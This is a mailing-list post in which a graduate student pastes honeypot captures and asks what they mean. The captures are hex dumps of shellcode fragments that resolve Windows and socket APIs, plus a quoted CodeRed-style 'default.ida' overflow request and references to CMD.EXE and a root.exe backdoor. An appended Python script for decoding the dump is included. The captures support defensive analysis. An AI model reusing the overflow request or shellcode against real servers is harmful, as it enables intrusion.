Security Basics mailing list archives
Need Help
From: Pat Garlick <patlg1 () netzero net>
Date: 19 Aug 2003 06:01:41 -0000
Hello:

I have some captured files from a Honeyd that was in operation back in May-June of this year. I launched this Honeyd as part of my Graduate Studies Project. The one thing that occurred frequently on this box was the attempted launch of a CodeRedII Worm and Buffer Overflows. On these files is some other activity that I am not proficient enough to decipher what is going on. I am making some guesses that there was loading of files going on? I am posting this to find out if someone in this users group would be able to adequately provide information? I will be adding it to the paper that I have to write and I want to be as accurate as possible. If there is another users group that I should be submitting this to, let me know that as well.

A small portion of one of the captured files I have pasted below. If it doesn't come through or is jumbled, let me know how I can submit it. I look forward to hearing from whoever soon with your help with this need.

Thanks much,
Pat.

This was converted in a Hex Editor to text and binary.

54 0B 78 03 00 00 42 0C 00 3C 03 4B 45 52 4E 75 T.x...B..<.KERNu
00 00 7C 03 04 45 4C 33 32 75 00 33 00 49 00 72 ..|..EL32u.3.I.r
20 03 00 00 41 00 00 3C 03 47 65 74 50 75 00 00 ...A..<.GetPu..
7C 03 04 72 6F 63 41 75 00 03 4A 10 49 00 00 03 |..rocAu..J.I...
4A 24 0F 00 0C 0B 00 00 02 03 4A 1C 00 04 0B 03 J$........J.....
00 00 44 24 24 64 67 00 06 00 00 58 61 00 00 51 ..D$$dg....Xa..Q
00 00 00 00 5D 00 00 45 00 00 0D 00 00 00 4C 6F ....]..E......Lo
61 64 4C 69 62 72 61 72 79 41 00 00 75 00 00 55 adLibraryA..u..U
00 00 45 00 00 0D 00 00 00 43 72 65 61 74 65 54 ..E......CreateT
68 72 65 61 64 00 00 75 00 00 55 00 00 45 00 00 hread..u..U..E..
0D 00 00 00 47 65 74 54 69 63 6B 43 6F 75 6E 74 ....GetTickCount
00 00 75 00 00 55 00 00 45 00 00 06 00 00 00 53 ..u..U..E......S
6C 65 65 70 00 00 75 00 00 55 00 00 45 00 00 17 leep..u..U..E...
00 00 00 47 65 74 53 79 73 74 65 6D 44 65 66 61 ...GetSystemDefa
75 6C 74 4C 61 6E 67 49 44 00 00 75 00 00 55 00 ultLangID..u..U.
00 45 00 00 14 00 00 00 47 65 74 53 79 73 74 65 .E......GetSyste
6D 44 69 72 65 63 74 6F 72 79 41 00 00 75 00 00 mDirectoryA..u..
55 00 00 45 00 00 0A 00 00 00 43 6F 70 79 46 69 U..E......CopyFi
6C 65 41 00 00 75 00 00 55 00 00 45 00 00 10 00 leA..u..U..E....
00 00 47 6C 6F 62 61 6C 46 69 6E 64 41 74 6F 6D ..GlobalFindAtom
41 00 00 75 00 00 55 00 00 45 00 00 0F 00 00 00 A..u..U..E......
47 6C 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 00 GlobalAddAtomA..
75 00 00 55 00 00 45 00 00 0C 00 00 00 43 6C 6F u..U..E......Clo
73 65 48 61 6E 64 6C 65 00 00 75 00 00 55 00 00 seHandle..u..U..
45 00 00 08 00 00 00 5F 6C 63 72 65 61 74 00 00 E......_lcreat..
75 00 00 55 00 00 45 00 00 08 00 00 00 5F 6C 77 u..U..E......_lw
72 69 74 65 00 00 75 00 00 55 00 00 45 00 00 08 rite..u..U..E...
00 00 00 5F 6C 63 6C 6F 73 65 00 00 75 00 00 55 ..._lclose..u..U
00 00 45 00 00 0E 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst
65 6D 54 69 6D 65 00 00 75 00 00 55 00 00 45 00 emTime..u..U..E.
00 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 .....WS2_32.DLL.
00 55 00 46 00 3E 44 00 05 00 36 00 00 00 36 00 .U.F.>D...6...6.
00 00 00 06 25 5D 00 19 00 00 00 5F 00 2D 08 00 ....%]....._.-..

2">..</he...>\...6...6.....%]....._.-..E..(.l..@..\....DUhB.P.q. ..X..~.P.>..T..ad>....<script> ..function Homepage(){..<!--..// in real bits, urls get returned to our script like this:..// res ://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm ...../ /For testing use DocURL = "res://shdocvw.dll/http_404.htm#https: //www.microsoft.com/bar.htm"...DocURL = document.URL;.......//th is is where the http or https will be, as found by searching for :// but skipping the res://...protocolIndex=DocURL.indexOf(":// ",4);......//this finds the ending slash for the domain server .
..serverIndex=D...>....6...6.....%]....._.-..E..(.m..@..[....DUh ........h...B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGet Tf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B ....=U..Qt.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E. P........<a...E...@...........).......E.j..E.P1.Qf..x.Q.E.P.E.P.

This occurred just before the launch of the CodeRedII worm, a buffer overflow. I would like to know what is going on with \CMD.EXE and d:\inetpub\scripts\root.exe. What is that file?

.@..d..GET/default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090% u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00 =a HTTP/1.0..Content-type: text/xml.Content-length: 3379 ...... ..`........dg.6..dg.&.......h......\...P.U...\...P.U..@.....X... .\........\CMD.EXE.^.....cj......d:\inetpub\scripts\root.exe...$ ....\...P.U...>?I..6...6.....%]....._.-..E..(....@.......DUhB.P. V.;.I.QuZP.>.$u.....>....N...N......_.-..%]....E..@.K@.j..dDUhB. ....V.P.QuZ.;.IP.@.#...bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u 6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078% u0000%u00=a HTTP/1.0..Content-type: text/xml.Content-length: 3379

One last portion below:

00 00 42 00 0E 01 01 01 01 01 01 01 70 00 42 01 ..B.........p.B.
70 00 42 00 00 00 00 00 00 00 00 68 00 00 00 42 p.B........h...B
00 01 01 01 01 31 00 00 18 50 00 00 35 01 01 01 .....1...P..5...
05 50 00 00 51 68 2E 64 6C 6C 68 65 6C 33 32 68 .P..Qh.dllhel32h
6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 43 68 kernQhounthickCh
47 65 74 54 66 00 6C 6C 51 68 33 32 2E 64 68 77 GetTf.llQh32.dhw
73 32 5F 66 00 65 74 51 68 73 6F 63 6B 66 00 74 s2_f.etQhsockf.t
6F 51 68 73 65 6E 64 00 18 10 00 42 00 45 00 50 oQhsend....B.E.P
00 16 50 00 45 00 50 00 45 00 50 00 16 50 00 10 ..P.E.P.E.P..P..
10 00 42 00 1E 00 03 3D 55 00 00 51 74 05 00 1C ..B....=U..Qt...
10 00 42 00 16 00 00 31 00 51 51 50 00 00 03 01 ..B....1.QQP....
04 00 00 00 01 01 01 01 51 00 45 00 50 00 45 00 ........Q.E.P.E.
50 00 16 6A 11 6A 02 6A 02 00 00 50 00 45 00 50 P..j.j.j...P.E.P
00 45 00 50 00 16 00 00 09 00 00 00 3C 61 00 00 .E.P........<a..
00 45 00 00 0C 40 00 14 00 00 00 04 01 00 00 00 .E...@..........
08 29 00 00 04 00 01 00 00 45 00 6A 10 00 45 00 .).......E.j..E.
50 31 00 51 66 00 00 78 01 51 00 45 03 50 00 45 P1.Qf..x.Q.E.P.E
00 50 00 00 00 00 00 13 00 3E 77 00 0D 00 72 01 .P.......>w...r.
00 00 72 01 00 00 00 06 25 5D 00 19 00 00 00 5F ..r.....%]....._
00 2D 08 00 45 00 01 64 00 6B 40 00 00 01 35 00 .-..E..d.k@...5.

B........h...B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGe tTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P.... B....=U..Qt.....B....1.QQP............Q.E.P.E.P..j.j.j..-..>.{..

I found out that Q.E.P.E.P is really a web link. There are several web links in all of the captured files with strange names.
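One way to triage a hex-editor listing like the one quoted in the post, as an added example that is not part of the original message: a small Python script that rebuilds the raw bytes from the hex columns (the '.'-padded printable column is ignored), runs a strings(1)-style scan that is not broken by row boundaries, and walks the name entries, which in the quoted rows each consist of a length byte (name length plus one), three zero bytes, the name and a NUL. The sample rows are copied from the post; the function names are my own, and the recovered names (LoadLibraryA, CreateThread, GetTickCount, Sleep, and in the full listing GetSystemDirectoryA, CopyFileA and WS2_32.DLL) are Win32 API and library names, which is what a by-name API lookup table looks like in a capture (the first rows of the same listing also show KERNEL32 and GetProcAddress).

```python
import re

# Constructed sample: seven rows copied from the hex-editor listing in the post
# (16 hex bytes, then the printable column). Only the hex part is parsed.
SAMPLE_ROWS = """\
00 00 00 00 5D 00 00 45 00 00 0D 00 00 00 4C 6F ....]..E......Lo
61 64 4C 69 62 72 61 72 79 41 00 00 75 00 00 55 adLibraryA..u..U
00 00 45 00 00 0D 00 00 00 43 72 65 61 74 65 54 ..E......CreateT
68 72 65 61 64 00 00 75 00 00 55 00 00 45 00 00 hread..u..U..E..
0D 00 00 00 47 65 74 54 69 63 6B 43 6F 75 6E 74 ....GetTickCount
00 00 75 00 00 55 00 00 45 00 00 06 00 00 00 53 ..u..U..E......S
6C 65 65 70 00 00 75 00 00 55 00 00 45 00 00 17 leep..u..U..E...
"""

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")


def parse_hex_rows(dump: str) -> bytes:
    """Rebuild raw bytes from rows of the form 'XX XX ... XX <ascii column>'.
    The ASCII column is dropped so a '.' placeholder is never taken for data."""
    out = bytearray()
    for line in dump.splitlines():
        pairs = line.split()[:16]
        if len(pairs) == 16 and all(HEX_PAIR.fullmatch(p) for p in pairs):
            out += bytes(int(p, 16) for p in pairs)
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> list[str]:
    """strings(1)-style scan over the rebuilt bytes, so names that the listing
    splits across two rows ('Lo' / 'adLibraryA') come back whole."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def length_prefixed_names(data: bytes) -> list[str]:
    """Walk the name table as it appears in the quoted rows: one byte holding
    the name length plus one (for the NUL), three zero bytes, the name, a NUL."""
    names, i = [], 0
    while i < len(data):
        n, end = data[i], i + 4 + data[i]
        if 2 <= n <= 64 and data[i + 1:i + 4] == b"\x00\x00\x00" and end <= len(data):
            name = data[i + 4:end - 1]
            if data[end - 1] == 0 and re.fullmatch(rb"[A-Za-z0-9_.]+", name):
                names.append(name.decode())
                i = end
                continue
        i += 1
    return names


if __name__ == "__main__":
    raw = parse_hex_rows(SAMPLE_ROWS)
    print(len(raw), "bytes")
    print("strings:", printable_strings(raw))
    print("table:  ", length_prefixed_names(raw))
```

Feeding the whole listing through the same functions recovers the rest of the table; the GET /default.ida request with its %u-encoded tail, quoted later in the post, is the Code Red family request signature and would be checked in the web server log rather than in this dump.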